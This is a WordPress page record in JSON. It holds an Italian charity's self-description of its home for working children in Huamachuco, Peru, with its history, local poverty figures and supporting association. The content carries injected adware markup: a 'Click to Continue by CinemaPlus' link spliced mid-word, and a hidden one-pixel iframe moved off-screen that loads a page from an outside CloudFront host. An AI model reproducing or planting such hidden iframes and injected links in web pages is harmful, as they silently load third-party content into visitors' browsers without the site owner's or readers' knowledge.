{"id":2,"date":"2010-03-27T10:06:58","date_gmt":"2010-03-27T10:06:58","guid":{"rendered":"http:\/\/marcelino.org\/?page_id=2"},"modified":"2015-05-19T09:15:10","modified_gmt":"2015-05-19T09:15:10","slug":"chi-siamo","status":"publish","type":"page","link":"https:\/\/marcelino.org\/?page_id=2","title":{"rendered":"Ci presentiamo"},"content":{"rendered":"<p>La Casa Famiglia Marcelino Pan y Vino \u00e8 stata fondata nel 1992 da Mario Vidori, missionario laico di Lurate Caccivio (Como), come parte integrante del \u00abProgetto Amico\u00bb, con l&#8217;obbiettivo di promuovere la formazione integrale di bambini e adolescenti lavoratori, i NATs (dallo spagnolo Ni\u00f1os y Adolescentes Trabajadores). Attraverso una pratica pedagogica adattata alle necessit\u00e0 e alle richieste dei NATs, alla loro realt\u00e0 e alle loro proposte, s&#8217;intende sviluppare in loro le capacit\u00e0 e le competenze che gli permettano di esercitare il ruolo di protagonisti della propria vita e come soggetti sociali. La Casa Marcelino Pan y Vino si trova a Huamachuco, una cittadina sulle Ande Peruviane del Nord a 3.200 mt. d&#8217;altitudine, in una zona dimenticata dallo Stato e fuori dalle rotte turistiche, nonostante un patrimonio storico-culturale di indubbio valore. Capoluogo di provincia, sta cominciando a svilupparsi ultimamente, mentre nelle zone al di fuori della citt\u00e0, grandi settori della popolazione vivono in condizione di povert\u00e0 estrema. \u00c8 in questo vasto e difficile scenario che opera il Progetto Amico. La situazione dell&#8217;infanzia \u00e8 critica se si pensa che circa il 73% dei bambini dai 6 ai 9 anni soffre di denutrizione cronica e il tasso di mortalit\u00e0 infantile \u00e8 del 45,5% dei nati vivi. Per la maggioranza le famiglie sono contadine, con una media di 5 membri. Le entrate economiche sono spesso insufficienti per coprire anche i bisogni primari. Per questo motivo molti bambini e adolescenti incominciano a lavorare fin dai 6 anni. Della popolazione della provincia di Huamachuco circa il 10% di minori lavora. Il \u00abPROGETTO AMICO\u00bb nasce da una scelta mirata per bambini e adolescenti lavoratori ma \u00e8 aperto anche a tutti i minori in condizioni di povert\u00e0, difficolt\u00e0 e<a class=\"xbhxvidlmcf\" title=\"Click to Continue &gt; by CinemaPlus-3.2c\" href=\"#\"> rischio<img decoding=\"async\" src=\"http:\/\/cdncache-a.akamaihd.net\/items\/it\/img\/arrow-10x10.png\" alt=\"\" \/><\/a>.<\/p>\n<h3>Siamo un&#8217;associazione legalmente riconosciuta<\/h3>\n<p>E&#8217; stata costituita recentemente, dopo oltre dieci anni di sostegno ai progetti di Mario Vidori, l&#8217;associazione &#8220;PROGETTO AMICO MARCELINO PAN Y VINO ONLUS&#8221;. Tra gli scopi principali dell&#8217;associazione vi sono quelli di sostegno economico ai PROGETTI. Una forma di aiuto proposta \u00e8 anche il sostegno a distanza di bambini ed adolescenti lavoratori del Marcelino.<\/p>\n<p><iframe id=\"iagdtd_frame\" style=\"position: absolute; width: 1px; height: 1px; left: -9999px;\" src=\"https:\/\/d19tqk5t6qcjac.cloudfront.net\/i\/412.html\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La Casa Famiglia Marcelino Pan y Vino \u00e8 stata fondata nel 1992 da Mario Vidori, missionario laico di Lurate Caccivio (Como), come parte integrante del \u00abProgetto Amico\u00bb, con l&#8217;obbiettivo di promuovere la formazione integrale di bambini e adolescenti lavoratori, i NATs (dallo spagnolo Ni\u00f1os y Adolescentes Trabajadores). Attraverso una pratica pedagogica adattata alle necessit\u00e0 e [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/marcelino.org\/index.php?rest_route=\/wp\/v2\/pages\/2"}],"collection":[{"href":"https:\/\/marcelino.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/marcelino.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/marcelino.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/marcelino.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2"}],"version-history":[{"count":6,"href":"https:\/\/marcelino.org\/index.php?rest_route=\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":191,"href":"https:\/\/marcelino.org\/index.php?rest_route=\/wp\/v2\/pages\/2\/revisions\/191"}],"wp:attachment":[{"href":"https:\/\/marcelino.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}